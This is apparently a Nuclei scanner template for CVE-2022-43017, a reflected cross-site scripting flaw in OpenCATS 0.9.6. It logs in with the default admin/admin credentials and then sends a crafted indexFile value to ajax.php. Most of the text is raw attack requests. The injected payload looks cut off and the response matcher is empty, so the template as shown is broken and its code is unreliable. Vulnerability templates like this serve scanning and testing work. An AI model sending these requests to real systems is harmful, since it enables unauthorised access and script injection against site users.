id: CVE-2022-43017 info: name: OpenCATS - Cross Site Scripting author: arafatansari severity: medium description: | OpenCATS v0.9.6 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the indexFile component. reference: - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-43017 tags: xss,cve,2022 requests: - raw: - | POST /index.php?m=login&a=attemptLogin HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded username=admin&password=admin - | GET /ajax.php?f=getPipelineJobOrder&joborderID=1&page=0&entriesPerPage=1&sortBy=dateCreatedInt&sortDirection=desc&indexFile=15)">&isPopup=0 HTTP/1.1 Host: {{Hostname}} host-redirects: true max-redirects: 2 cookie-reuse: true matchers-condition: and matchers: - type: status status: - 200 - type: word words: - ''